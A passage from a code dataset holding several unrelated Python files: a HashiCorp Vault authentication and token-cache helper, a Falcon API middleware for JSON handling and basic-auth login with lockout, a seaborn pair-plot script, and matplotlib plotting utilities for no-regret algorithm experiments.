'no')))\nVAULT_DEBUG = bool(distutils.util.strtobool(os.environ.get('VAULT_DEBUG', 'no')))\nVAULT_TOKEN_LEASE_RENEW_SECONDS = int(os.environ.get(\"VAULT_TOKEN_LEASE_RENEW_SECONDS\", '3600'))\n\n# Vault Authentication Option: Token\nVAULT_TOKEN = os.getenv(\"VAULT_TOKEN\")\n\n# Vault Authentication Option: AppID\nVAULT_APPID = os.getenv(\"VAULT_APPID\")\nVAULT_USERID = os.getenv(\"VAULT_USERID\")\n\n# Vault Authentication Option: AWS IAM\nVAULT_IAM_HEADER_VALUE = os.getenv('VAULT_IAM_HEADER_VALUE')\nVAULT_IAM_ROLE = os.getenv('VAULT_IAM_ROLE')\nVAULT_IAM_REGION = os.getenv('VAULT_IAM_REGION', 'us-east-1') # This is the signature signing region, not the endpoint region\n\n# Vault Authentication Option: Kubernetes\nVAULT_KUBERNETES_ROLE = os.getenv('VAULT_KUBERNETES_ROLE')\nVAULT_KUBERNETES_TOKEN_PATH = os.getenv('VAULT_KUBERNETES_TOKEN_PATH')\nVAULT_KUBERNETES_AUTH_PATH = os.getenv('VAULT_KUBERNETES_AUTH_PATH', AUTH_TYPE_KUBERNETES)\n\n# Vault Authentication Option: SSL Client Certificate\nVAULT_SSLCERT = os.getenv(\"VAULT_SSLCERT\")\nVAULT_SSLKEY = os.getenv(\"VAULT_SSLKEY\")\n\n# Vault Authentication Option: AppRole\nVAULT_ROLEID = os.getenv(\"VAULT_ROLEID\")\nVAULT_SECRETID = os.getenv(\"VAULT_SECRETID\")\n\n# File path to use for caching the vault token\nVAULT_TOKEN_CACHE = os.getenv(\"VAULT_TOKEN_CACHE\", \".vault-token\")\nVAULT_AWS_CACHE = os.getenv(\"VAULT_AWS_CACHE\", \".vault-aws\")\nVAULT_DB_CACHE = os.getenv(\"VAULT_DB_CACHE\", \".vault-db\")\n\n# Secret path to obtain database credentials\nVAULT_DATABASE_PATH = 
os.environ.get(\"VAULT_DATABASE_PATH\")\nVAULT_DATABASE_RETRY_DELAY = float(os.environ.get(\"VAULT_DATABASE_RETRY_DELAY\", '2'))\nVAULT_DATABASE_LEASE_RENEW_SECONDS = int(os.environ.get(\"VAULT_DATABASE_LEASE_RENEW_SECONDS\", '3600'))\n\n# Secret path to obtain AWS credentials\nVAULT_AWS_PATH = os.environ.get(\"VAULT_AWS_PATH\")\n\n# PostgreSQL role to assume upon connection\nDATABASE_OWNERROLE = os.environ.get(\"DATABASE_OWNERROLE\")\n\n# Thread local storage used to store the VaultAuthenticator instance\nthreadLocal = threading.local()\n\n\nclass VaultAuthenticator(object):\n\n @classmethod\n def has_envconfig(cls):\n has_url = bool(VAULT_URL)\n has_token = bool(VAULT_TOKEN)\n has_appid = (VAULT_APPID and VAULT_USERID)\n has_iam = (VAULT_IAM_HEADER_VALUE and VAULT_IAM_ROLE)\n has_kube = (VAULT_KUBERNETES_ROLE and VAULT_KUBERNETES_TOKEN_PATH)\n has_ssl = (VAULT_SSLCERT and VAULT_SSLKEY)\n has_approle = (VAULT_ROLEID and VAULT_SECRETID)\n return has_url and (has_token or has_appid or has_iam or has_kube or has_ssl or has_approle)\n\n\n @classmethod\n def fromenv(cls):\n if VAULT_TOKEN:\n return cls.token(VAULT_URL, VAULT_TOKEN)\n elif VAULT_APPID and VAULT_USERID:\n return cls.app_id(VAULT_URL, VAULT_APPID, VAULT_USERID)\n elif VAULT_IAM_HEADER_VALUE and VAULT_IAM_ROLE:\n return cls.aws_iam(VAULT_URL, VAULT_IAM_HEADER_VALUE, VAULT_IAM_ROLE)\n elif VAULT_KUBERNETES_ROLE and VAULT_KUBERNETES_TOKEN_PATH:\n return cls.kubernetes(VAULT_URL, VAULT_KUBERNETES_ROLE, VAULT_KUBERNETES_TOKEN_PATH)\n elif VAULT_ROLEID and VAULT_SECRETID:\n return cls.approle(VAULT_URL, VAULT_ROLEID, VAULT_SECRETID)\n elif VAULT_SSLCERT and VAULT_SSLKEY:\n return cls.ssl_client_cert(VAULT_URL, VAULT_SSLCERT, VAULT_SSLKEY)\n raise VaultConfigurationError(\"Unable to configure Vault authentication from the environment\")\n\n\n @classmethod\n def app_id(cls, url, app_id, user_id):\n creds = (app_id, user_id)\n return cls(url, creds, AUTH_TYPE_APPID, AUTH_TYPE_APPID)\n\n\n @classmethod\n def approle(cls, url, role_id, secret_id=None, mountpoint=AUTH_TYPE_APPROLE):\n creds = (role_id, secret_id)\n return cls(url, creds, AUTH_TYPE_APPROLE, mountpoint)\n\n\n @classmethod\n def aws_iam(cls, url, header_value, role):\n creds = (header_value, role)\n return cls(url, creds, AUTH_TYPE_AWS_IAM, AUTH_TYPE_AWS_IAM)\n\n\n @classmethod\n def kubernetes(cls, url, role, token_path, mountpoint=VAULT_KUBERNETES_AUTH_PATH):\n with open(token_path, 'r') as token_file:\n token = token_file.read()\n creds = (role, token)\n return cls(url, creds, AUTH_TYPE_KUBERNETES, mountpoint)\n\n\n @classmethod\n def ssl_client_cert(cls, url, certfile, keyfile):\n if not os.path.isfile(certfile) or not os.access(certfile, os.R_OK):\n raise VaultCredentialProviderError(\"File not found or not readable: %s\" % certfile)\n if not os.path.isfile(keyfile) or not os.access(keyfile, os.R_OK):\n raise VaultCredentialProviderError(\"File not found or not readable: %s\" % keyfile)\n creds = (certfile, keyfile)\n i = cls(url, creds, AUTH_TYPE_SSL, AUTH_TYPE_SSL)\n i.credentials = (certfile, keyfile)\n return i\n\n\n @classmethod\n def token(cls, url, token):\n return cls(url, token, AUTH_TYPE_TOKEN, AUTH_TYPE_TOKEN)\n\n\n def __init__(self, url, credentials, auth_type, auth_mount):\n self.url = url\n self.credentials = credentials\n self.auth_type = auth_type\n self.auth_mount = auth_mount\n self.ssl_verify = VAULT_CACERT if VAULT_CACERT else VAULT_SSL_VERIFY\n self._client = None\n self._client_pid = None\n self._client_expires = None\n # Start background thread to 
keep the Vault token fresh\n self.start_background_lease_renewer(interval=TOKEN_RENEW_INTERVAL)\n\n\n @property\n def token_filename(self):\n return os.path.abspath(os.path.expanduser(VAULT_TOKEN_CACHE))\n\n\n @property\n def lock_filename(self):\n return '{}.lock'.format(self.token_filename)\n\n\n def authenticated_client(self):\n # Is there a valid client still in memory? Try to use it.\n if self._client and self._client_pid and self._client_expires:\n refresh_threshold = (self._client_expires - timedelta(seconds=TOKEN_REFRESH_SECONDS))\n if self._client_pid == os.getpid() and datetime.now(tz=pytz.UTC) <= refresh_threshold and self._client.is_authenticated():\n return self._client\n\n # Obtain a lock file so prevent races between multiple processes trying to obtain tokens at the same time\n with portalocker.Lock(self.lock_filename, timeout=10):\n\n # Try to use a cached token if at all possible\n cache = self.read_token_cache()\n if cache:\n client = hvac.Client(url=self.url, verify=self.ssl_verify, token=cache['token'])\n if client.is_authenticated():\n self._client = client\n self._client_pid = os.getpid()\n self._client_expires = cache['expire_time']\n return self._client\n\n # Couldn't use cache, so obtain a new token instead\n client = self.build_client()\n self.write_token_cache(client)\n\n # Return the client\n return client\n\n\n def build_client(self):\n if self.auth_type == AUTH_TYPE_TOKEN:\n client = hvac.Client(url=self.url, verify=self.ssl_verify, token=self.credentials)\n\n elif self.auth_type == AUTH_TYPE_APPID:\n client = hvac.Client(url=self.url, verify=self.ssl_verify)\n client.auth_app_id(*self.credentials)\n\n elif self.auth_type == AUTH_TYPE_AWS_IAM:\n import boto3\n session = boto3.Session()\n credentials = session.get_credentials()\n client = hvac.Client(url=self.url, verify=self.ssl_verify)\n client.auth_aws_iam(\n access_key=credentials.access_key,\n secret_key=credentials.secret_key,\n session_token=credentials.token,\n header_value=self.credentials[0],\n mount_point=self.auth_mount,\n role=self.credentials[1],\n use_token=True,\n region=VAULT_IAM_REGION)\n\n elif self.auth_type == AUTH_TYPE_KUBERNETES:\n client = hvac.Client(url=self.url, verify=self.ssl_verify)\n client.auth_kubernetes(\n role=self.credentials[0],\n jwt=self.credentials[1],\n use_token=True,\n mount_point=self.auth_mount)\n\n elif self.auth_type == AUTH_TYPE_APPROLE:\n client = hvac.Client(url=self.url, verify=self.ssl_verify)\n client.auth_approle(*self.credentials, mount_point=self.auth_mount, use_token=True)\n\n elif self.auth_type == AUTH_TYPE_SSL:\n client = hvac.Client(url=self.url, verify=self.ssl_verify, cert=self.credentials)\n client.auth_tls()\n\n else:\n raise VaultCredentialProviderError(\"Missing or invalid Vault authentication configuration\")\n\n if not client.is_authenticated():\n raise VaultCredentialProviderError(\"Unable to authenticate Vault client using provided credentials \" \"(type=%s)\" % self.auth_type)\n\n return client\n\n\n def renew_lease(self):\n logger.info('Attempting to renew Vault token lease.')\n with portalocker.Lock(self.lock_filename, timeout=10):\n # Read the current lease data from disk\n data = self.read_token_cache(lease_grace_period=0)\n if not data:\n logger.info('Failed to renew lease because the Vault token cache was empty.')\n return\n # Check if we still need to renew the lease\n now = datetime.now(tz=pytz.UTC)\n old_expiry = data['expire_time']\n refresh_threshold = (old_expiry - timedelta(seconds=(TOKEN_REFRESH_SECONDS + 
TOKEN_RENEW_INTERVAL)))\n if now < refresh_threshold:\n logger.info('Not renewing Vault token lease because the current expiry time is acceptable. now=[%s], expires=[%s]', now, old_expiry)\n return\n # Renew the lease\n client = self.authenticated_client()\n try:\n result = client.renew_token(increment=VAULT_TOKEN_LEASE_RENEW_SECONDS)\n except Exception as e:\n logger.warning('Failed to renew Vault token lease. error=[%s]', e)\n return\n # Write the result back to disk\n self.write_token_cache(client)\n lease_duration = result.get('auth', {}).get('lease_duration', 0)\n new_expiry = datetime.now(tz=pytz.UTC) + timedelta(seconds=lease_duration)\n logger.info(\"Renewed lease for Vault token. accessor=[%s], old_expires=[%s], new_expires=[%s]\",\n result.get('auth', {}).get('accessor', ''),\n old_expiry.isoformat(),\n new_expiry.isoformat())\n return\n\n\n def start_background_lease_renewer(self, interval):\n if getattr(self, 'daemon_thread', None) and self.daemon_thread.is_alive():\n return\n self.daemon_thread = Thread(\n target=self.start_lease_renewer,\n args=(interval, ),\n daemon=True)\n self.daemon_thread.start()\n\n\n def start_lease_renewer(self, interval):\n loop = asyncio.new_event_loop()\n\n def _schedule():\n jitter = (interval / 5)\n min_interval = interval - jitter\n max_interval = interval + jitter\n # randrange requires integer bounds\n in_seconds = random.randrange(int(min_interval), int(max_interval))\n logger.info('Will attempt to renew Vault token lease in %s seconds', in_seconds)\n loop.call_later(in_seconds, _renew)\n\n def _renew():\n try:\n self.renew_lease()\n except Exception as e:\n logger.exception('Failed to renew Vault token lease. error=[%s]', e)\n _schedule()\n\n _schedule()\n loop.run_forever()\n\n\n def read_token_cache(self, lease_grace_period=TOKEN_REFRESH_SECONDS):\n # Try to read the cached token from the file system\n try:\n with open(self.token_filename, 'r') as token_file:\n data = json.load(token_file)\n except OSError:\n return None\n\n # Parse the token expiration time\n try:\n data['expire_time'] = dateutil.parser.parse(data.get('expire_time'))\n except ValueError:\n return None\n\n # Check if the token is expired. 
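(with the default\n # lease_grace_period of 600 seconds, i.e. TOKEN_REFRESH_SECONDS, a token\n # counts as expired once less than ten minutes of lease remain). 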
If it is, return None\n refresh_threshold = (data['expire_time'] - timedelta(seconds=lease_grace_period))\n if datetime.now(tz=pytz.UTC) > refresh_threshold:\n return None\n\n return data\n\n\n def write_token_cache(self, client):\n token_info = client.lookup_token()\n self._client = client\n self._client_pid = os.getpid() # Store the current PID so we know to create a new client if this process gets forked.\n if token_info['data']['expire_time']:\n self._client_expires = dateutil.parser.parse(token_info['data']['expire_time'])\n else:\n self._client_expires = datetime.now(tz=pytz.UTC) + timedelta(days=30)\n token_data = {\n 'expire_time': self._client_expires,\n 'token': self._client.token,\n }\n with open(self.token_filename, 'w') as token_file:\n json.dump(token_data, token_file, cls=DjangoJSONEncoder)\n # Make the file only readable to the owner\n os.chmod(self.token_filename, stat.S_IRUSR | stat.S_IWUSR)\n\n\n def purge_token_cache(self):\n with portalocker.Lock(self.lock_filename, timeout=10):\n try:\n os.unlink(self.token_filename)\n except FileNotFoundError:\n pass\n\n\n\ndef init_vault():\n if VaultAuthenticator.has_envconfig():\n threadLocal.vaultAuthenticator = VaultAuthenticator.fromenv()\n else:\n threadLocal.vaultAuthenticator = None\n logger.warning('Could not load Vault configuration from environment variables')\n\n\ndef reset_vault():\n threadLocal.vaultAuthenticator = None\n\n\ndef get_vault_auth():\n if not getattr(threadLocal, 'vaultAuthenticator', None):\n init_vault()\n return threadLocal.vaultAuthenticator\n","sub_path":"src/vaulthelpers/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":14913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"409849943","text":"import falcon, json, base64, datetime\nfrom passlib.hash import pbkdf2_sha512\n\nimport pycomponents\n\nconfig = pycomponents.initConfig()\nmongodb_collection_authenticator = config.get('component-authenticator', 'collection', fallback='component-authenticator')\n\nclass RequireJSON(object):\n def process_request(self, req, resp):\n if not req.client_accepts_json:\n raise falcon.HTTPNotAcceptable('This API only supports responses encoded as JSON.')\n\n if req.method in ('POST', 'PUT'):\n if req.content_type is None or 'application/json' not in req.content_type:\n raise falcon.HTTPUnsupportedMediaType('This API only supports requests encoded as JSON.')\n\n\nclass JSONTranslator(object):\n def process_request(self, req, resp):\n if req.content_length in (None, 0):\n return\n\n body = req.stream.read()\n if not body:\n raise falcon.HTTPBadRequest('Empty request body', 'A valid JSON document is required.')\n\n try:\n req.context['json'] = json.loads(body.decode('utf-8'))\n\n except (ValueError, UnicodeDecodeError):\n raise falcon.HTTPError(falcon.HTTP_753, 'Malformed JSON', 'Could not decode the request body. 
The JSON was incorrect or not encoded as UTF-8.')\n\n def process_response(self, req, resp, resource):\n if 'json' not in resp.context:\n return\n\n resp.body = json.dumps(resp.context['json'])\n\nclass Auth(object):\n def process_request(self, req, resp):\n mongo_conn = pycomponents.initMongoDBConn(component=mongodb_collection_authenticator)\n\n req.context['msg'] = []\n req.context['status'] = (falcon.HTTP_200, 200, )\n\n auth_exp = req.auth.split(' ') if req.auth is not None else (None, None,)\n\n if auth_exp[0] is not None and auth_exp[0].lower() == 'basic':\n auth = base64.b64decode(auth_exp[1]).decode('utf-8').split(':')\n username = auth[0].lower()\n password = auth[1]\n else:\n raise falcon.HTTPUnauthorized('Unauthorized', 'Your access is not allowed.')\n\n\n security_login = mongo_conn['options'].find_one({\n 'key':'security-login'\n })\n\n req.context['account'] = mongo_conn['account'].find_one({\n 'email': username\n })\n\n if security_login is not None and security_login['value'] is True and req.context['account'] is not None:\n if 'security' in req.context['account']:\n expire_min = security_login['settings']['ban-time-min']\n expire_time = req.context['account']['security']['last-try'] + datetime.timedelta(minutes=expire_min)\n\n if security_login['settings']['count'] <= req.context['account']['security']['wrong-login'] and expire_time >= datetime.datetime.utcnow():\n raise falcon.HTTPForbidden('Forbidden', f'Too many login attempts, you can try again after {expire_time} UTC')\n\n elif expire_time < datetime.datetime.utcnow():\n mongo_conn['account'].update_one({\n '_id': req.context['account']['_id']\n }, {\n '$set': {\n 'security.wrong-login': 0,\n 'security.last-try': datetime.datetime.utcnow(),\n }\n })\n\n else:\n mongo_conn['account'].update_one({\n '_id': req.context['account']['_id']\n }, {\n '$set': {\n 'last-succees-login': datetime.datetime.utcnow(),\n 'security.wrong-login': 0,\n 'security.last-try': datetime.datetime.utcnow(),\n }\n })\n\n\n\n if req.context['account'] is None:\n req.context['status'] = (falcon.HTTP_UNAUTHORIZED, 401,)\n elif req.context['account'] is not None and pbkdf2_sha512.verify(password, req.context['account']['password']) is False:\n req.context['status'] = (falcon.HTTP_UNAUTHORIZED, 401,)\n\n if req.context['status'][1] != 200:\n req.context['msg'].append('Your email or password is wrong!')\n\n if security_login is not None and security_login['value'] is True and req.context['account'] is not None:\n mongo_conn['account'].update_one({\n '_id': req.context['account']['_id']\n }, {\n '$set': {\n 'security.last-try': datetime.datetime.utcnow(),\n },\n '$inc': {\n 'security.wrong-login': 1\n }\n })","sub_path":"pycomponents/falcon/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"437092806","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# pair_plot.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: gmonnier +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2018/10/08 13:21:17 by gmonnier #+# #+# #\n# Updated: 2018/11/17 15:56:18 by gmonnier ### ########.fr #\n# #\n# **************************************************************************** #\n\nimport seaborn as sns\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport sys\n\nimport utils\n\ndef cut_col(df):\n df.columns = [utils.cut_str(col) for col in df.columns.values]\n return df\n\ndef main():\n 
if len(sys.argv) != 2:\n print('Usage: %s [dataset_train.csv]' % (sys.argv[0]))\n sys.exit(1)\n\n try:\n df = utils.get_data(sys.argv[1])\n df = df.fillna(0)\n df = cut_col(df)\n sns.pairplot(df, hue=utils.cut_str(utils.HOUSES_COL),\n dropna=True, plot_kws={\"s\": 6}, height=1.75)\n plt.tight_layout()\n plt.subplots_adjust(\n left=0.04,\n bottom=0.07,\n right=0.92,\n top=0.99,\n wspace=0.52,\n hspace=0.71)\n plt.show()\n except Exception as e:\n print(e)\n print(\"Error trying to plot the pair plot\")\n sys.exit(1)\n ## Herbology, Astronomy, Defense against dark\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/pair_plot.py","file_name":"pair_plot.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"561109217","text":"'''\nCollection of utility functions to analyze Continuous No-Regret algorithms\n\n@author: Maximilian Balandat\n@date May 25, 2015\n'''\n\nimport numpy as np\nimport pickle, os\nfrom matplotlib import pyplot as plt\nfrom matplotlib import cm\nimport mpl_toolkits.mplot3d.axes3d as p3\nfrom .Domains import nBox, DifferenceOfnBoxes\n\n\ndef plot_results(results, offset=500, directory=None, show=True):\n \"\"\" Plots and shows or saves (or both) the simulation results \"\"\"\n # set up figures\n ylimits = [[np.Infinity, -np.Infinity] for i in range(3)]\n plt.figure(1)\n plt.title('cumulative regret, {} losses'.format(results[0].problem.lossfuncs[0].desc))\n plt.xlabel('t')\n plt.figure(2)\n plt.title('time-avg. cumulative regret, {} losses'.format(results[0].problem.lossfuncs[0].desc))\n plt.xlabel('t')\n plt.figure(3)\n plt.title(r'log time-avg. cumulative regret, {} losses'.format(results[0].problem.lossfuncs[0].desc))\n plt.xlabel('t') \n # and now plot, depending on what data is there\n for result in results:\n if result.algo in ['DA', 'OGD']:\n try:\n plt.figure(1)\n lavg = plt.plot(result.regs_norate['savg'][0], linewidth=2.0, label=result.label, rasterized=True)\n plt.fill_between(np.arange(result.problem.T), result.regs_norate['perc_10'][0], \n result.regs_norate['perc_90'][0], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(result.problem.T)[offset:], result.regs_norate['tsavg'][0][offset:], \n linewidth=2.0, label=result.label, rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_norate['tavg_perc_10'][0][offset:], \n result.regs_norate['tavg_perc_90'][0][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T)) \n plt.figure(3)\n lltsavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavg'][0], linewidth=2.0, \n label=result.label, rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_norate['tavg_perc_10'][0], \n result.regs_norate['tavg_perc_90'][0], color=lltsavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavgbnd'][0], '--', \n color=lltsavg[0].get_color(), linewidth=2, rasterized=True)\n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_norate['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_norate['tsavgbnd'][0])) \n except AttributeError: pass\n try:\n for i,(T,eta) in enumerate(result.etaopts.items()):\n plt.figure(1)\n lavg = plt.plot(result.regs_etaopts['savg'][i][0:T], linewidth=2.0, \n label=result.label+' '+r' $\\eta_{{opt}}(T={0:.1e}) = {1:.3f}$'.format(T, eta), 
rasterized=True)\n plt.plot(np.arange(T,result.problem.T), result.regs_etaopts['savg'][i][T:], '--', \n color=lavg[0].get_color(), linewidth=2, rasterized=True)\n plt.fill_between(np.arange(result.problem.T), result.regs_etaopts['perc_10'][i], \n result.regs_etaopts['perc_90'][i], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(offset,T), result.regs_etaopts['tsavg'][i][offset:T], linewidth=2.0, \n label=result.label+' '+r' $\eta_{{opt}}(T={0:.1e}) = {1:.3f}$'.format(T, eta), rasterized=True)\n plt.plot(np.arange(T,result.problem.T), result.regs_etaopts['tsavg'][i][T:], '--', \n color=ltavg[0].get_color(), linewidth=2, rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_etaopts['tavg_perc_10'][i][offset:], \n result.regs_etaopts['tavg_perc_90'][i][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T))\n plt.figure(3)\n llogtavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_etaopts['tsavg'][i], \n linewidth=2.0, label=result.label+' '+r' $\eta_{{opt}}(T={0:.1e}) = {1:.3f}$'.format(T, eta), rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_etaopts['tavg_perc_10'][i], \n result.regs_etaopts['tavg_perc_90'][i], color=llogtavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.plot(np.arange(1,result.problem.T+1), result.regs_etaopts['tsavgbnd'][i], '--', \n color=llogtavg[0].get_color(), linewidth=2, rasterized=True)\n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_etaopts['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_etaopts['tsavgbnd'][0])) \n # \n except AttributeError: pass\n try:\n for i,eta in enumerate(result.etas):\n plt.figure(1)\n lavg = plt.plot(result.regs_etas['savg'][i], linewidth=2.0, label=result.label+' '+r' $\eta = {0:.3f}$'.format(eta), rasterized=True)\n plt.fill_between(np.arange(result.problem.T), result.regs_etas['perc_10'][i], \n result.regs_etas['perc_90'][i], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(offset,result.problem.T), result.regs_etas['tsavg'][i][offset:], \n linewidth=2.0, label=result.label+' '+r'$\eta = {0:.3f}$'.format(eta), rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_etas['tavg_perc_10'][i][offset:], \n result.regs_etas['tavg_perc_90'][i][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T))\n plt.figure(3)\n llogtavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_etas['tsavg'][i], linewidth=2.0, \n label=result.label+' '+r' $\eta = {0:.3f}$'.format(eta), rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_etas['tavg_perc_10'][i], \n result.regs_etas['tavg_perc_90'][i], color=llogtavg[0].get_color(), alpha=0.1, rasterized=True) \n plt.plot(np.arange(1,result.problem.T+1), result.regs_etas['tsavgbnd'][i], '--', \n color=llogtavg[0].get_color(), linewidth=2, rasterized=True) \n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_etas['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_etas['tsavgbnd'][0])) \n except AttributeError: pass\n try:\n for i,alpha in enumerate(result.alphas):\n plt.figure(1)\n lavg = plt.plot(result.regs_alphas['savg'][i], linewidth=2.0,\n label=result.label+' '+r' $\eta_t = {0} \cdot t^{{{1}}}$'.format(result.thetas[i], -alpha), rasterized=True)\n plt.fill_between(np.arange(result.problem.T), 
result.regs_alphas['perc_10'][i], \n result.regs_alphas['perc_90'][i], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(result.problem.T)[offset:], result.regs_alphas['tsavg'][i][offset:], linewidth=2.0, \n label=result.label+' '+r' $\\eta_t = {0} \\cdot t^{{{1}}}$'.format(result.thetas[i], -alpha), rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_alphas['tavg_perc_10'][i][offset:], \n result.regs_alphas['tavg_perc_90'][i][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T)) \n plt.figure(3)\n lltsavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_alphas['tsavg'][i], linewidth=2.0, \n label=result.label+' '+r' $\\eta_t = {0} \\cdot t^{{{1}}}$'.format(result.thetas[i], -alpha), rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_alphas['tavg_perc_10'][i], \n result.regs_alphas['tavg_perc_90'][i], color=lltsavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.plot(np.arange(1,result.problem.T+1), result.regs_alphas['tsavgbnd'][i], '--', color=lltsavg[0].get_color(), \n linewidth=2.0, rasterized=True)\n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_alphas['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_alphas['tsavgbnd'][0])) \n except AttributeError: pass\n else:\n plt.figure(1)\n lavg = plt.plot(result.regs_norate['savg'][0], linewidth=2.0, label=result.label, rasterized=True)\n plt.fill_between(np.arange(result.problem.T), result.regs_norate['perc_10'][0], \n result.regs_norate['perc_90'][0], color=lavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.figure(2)\n ltavg = plt.plot(np.arange(result.problem.T)[offset:], result.regs_norate['tsavg'][0][offset:], \n linewidth=2.0, label=result.label, rasterized=True)\n plt.fill_between(np.arange(offset,result.problem.T), result.regs_norate['tavg_perc_10'][0][offset:], \n result.regs_norate['tavg_perc_90'][0][offset:], color=ltavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.xlim((0, result.problem.T)) \n plt.figure(3)\n lltsavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavg'][0], linewidth=2.0, \n label=result.label, rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_norate['tavg_perc_10'][0], \n result.regs_norate['tavg_perc_90'][0], color=lltsavg[0].get_color(), alpha=0.1, rasterized=True)\n plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavgbnd'][0], '--', \n color=lltsavg[0].get_color(), linewidth=2, rasterized=True)\n ylimits[2][0] = np.minimum(ylimits[2][0], np.min(result.regs_norate['tsavg'][0]))\n ylimits[2][1] = np.maximum(ylimits[2][1], 1.1*np.max(result.regs_norate['tsavgbnd'][0])) \n \n # make plots pretty and show legend\n plt.figure(1)\n plt.legend(loc='upper left', prop={'size':13}, frameon=False) \n plt.figure(2)\n plt.legend(loc='upper right', prop={'size':13}, frameon=False) \n plt.figure(3)\n plt.yscale('log'), plt.xscale('log')\n# plt.ylim(np.log(ylimits[2][0]), np.log(ylimits[2][1]))\n plt.legend(loc='upper right', prop={'size':13}, frameon=False) \n if directory:\n os.makedirs(directory+'figures/', exist_ok=True) # this could probably use a safer implementation \n filename = '{}{}_{}_'.format(directory+'figures/', results[0].problem.desc, results[0].problem.lossfuncs[0].desc)\n plt.figure(1)\n plt.savefig(filename + 'cumloss.pdf', bbox_inches='tight', dpi=300)\n plt.figure(2)\n plt.savefig(filename + 'tavgloss.pdf', 
bbox_inches='tight', dpi=300)\n plt.figure(3)\n plt.savefig(filename + 'loglogtavgloss.pdf', bbox_inches='tight', dpi=300)\n if show:\n plt.show()\n\n\ndef plot_dims(results, directory=None, show=True):\n \"\"\" Plots and shows or saves (or both) the simulation results \"\"\"\n # set up figures\n# ylimits = [np.Infinity, -np.Infinity]\n f = plt.figure()\n plt.title(r'log time-avg. cumulative regret, {} losses'.format(results[0].problem.lossfuncs[0].desc))\n plt.xlabel('t') \n dim_styles = {2:'--', 3:'-.', 4:':'}\n # and now plot, depending on what data is there\n for loss_results in results:\n for result in loss_results:\n lltsavg = plt.plot(np.arange(1,result.problem.T+1), result.regs_norate['tsavg'], linewidth=2.0, \n linestyle=dim_styles[result.dim], label=result.label, rasterized=True)\n plt.fill_between(np.arange(1,result.problem.T+1), result.regs_norate['tavg_perc_10'], result.regs_norate['tavg_perc_90'], \n linestyle=dim_styles[result.dim], color=lltsavg[0].get_color(), alpha=0.1, rasterized=True) \n # make plots pretty and show legend\n plt.yscale('log'), plt.xscale('log')\n plt.legend(loc='upper right', prop={'size':13}, frameon=False) \n if directory:\n os.makedirs(directory+'figures/', exist_ok=True) # this could probably use a safer implementation \n filename = '{}{}_{}_'.format(directory+'figures/', results[0].problem.desc, results[0].problem.lossfuncs[0].desc)\n plt.savefig(filename + 'loglogtavgloss.pdf', bbox_inches='tight', dpi=300)\n if show:\n plt.show()\n plt.close()\n\n\n\ndef plot_loglogs(results, directory=None, show=True, bounds=True, **kwargs):\n \"\"\" Plots and shows or saves (or both) the simulation results \"\"\"\n # set up figures\n f = plt.figure()\n loss_title = list(results[0].values())[0].problem.lossfuncs[0].desc\n plt.title(r'log time-avg. cumulative regret, {} losses'.format(loss_title))\n plt.xlabel('t')\n colors = ['k', 'r', 'g', 'b', 'c', 'm', 'y']*3\n loss_styles = ['-', '--', '-.', ':']*3\n labs = kwargs.get('labels')\n # and now plot, depending on what data is there\n for i,loss_results in enumerate(results):\n for j,key in enumerate(loss_results.keys()):\n r = 